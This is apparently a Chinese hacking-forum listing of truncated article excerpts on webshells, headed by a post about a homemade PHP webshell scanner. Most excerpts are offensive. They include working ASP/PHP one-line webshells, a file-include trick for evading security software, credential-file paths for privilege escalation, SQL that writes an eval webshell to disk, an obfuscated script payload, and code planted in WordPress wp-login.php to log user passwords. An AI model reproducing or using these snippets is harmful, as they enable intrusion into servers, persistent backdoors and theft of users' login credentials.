自己写的php木马webshell扫描器
因为前端时间服务器被放过 所以写了个webshell扫描器 呵呵 专杀php webshell 不管大马还是小马 包括一句话 现在放出代码来 <?php /* +--------------------------------------------------------------------------+ | Codz by indexphp Version:0.01 | | (c...
因为前端时间服务器被放过 所以写了个webshell扫描器 呵呵 专杀php webshell 不管大马还是小马 包括一句话 现在放出代码来 <?php /* +--------------------------------------------------------------------------+ | Codz by indexphp Version:0.01 | | (c...
密码是:yhsafe 自己拿去改吧! 下载地址:webshell-aspx
护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀! 所以可以用包含的方式 asp <!--#include file="../UpLoadFile/2011091711453973499.jpg" --> php <?php include "2.htm"; ?> 用这种方式的话!就不会被杀掉了! 细心就能发现原来如此! 现在在想法子突破不能添加到...
scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [...
第一,WEBSHELL 权限提升技巧 C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的 CIF 文件,破解得到 pcAnywhere 密码,登陆 c:\ProgramFiles\serv-u\ C:\WINNT\system32\config\ 下它的 SA...
比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request("sb")%> 程序代码 <%execute request("sb")%> 程序代码 <%execute(request("sb"))%> 程序代码 <%execute request("sb")%><%'...
上传好几个ASPX的webshell都被杀了 这个查看注册表竟然生存一下来了 不错 要的就赶紧下载吧 下载:reg
文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行): Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd])...
我原也以为这是ASCII码加密过的 73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛 全部数字减13,然后十进制解密 <script> var sun=[73,50,114,133,114,112,130,129,114,45,127...
webshell下记录Wordpress登陆密码方便进一步社工 原处:http://81sec.com/read.php?115 Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。 在文件wp-login.php中539行处添加: // log password $log_user=$_POST['log']; $log_pwd=$_POST['p...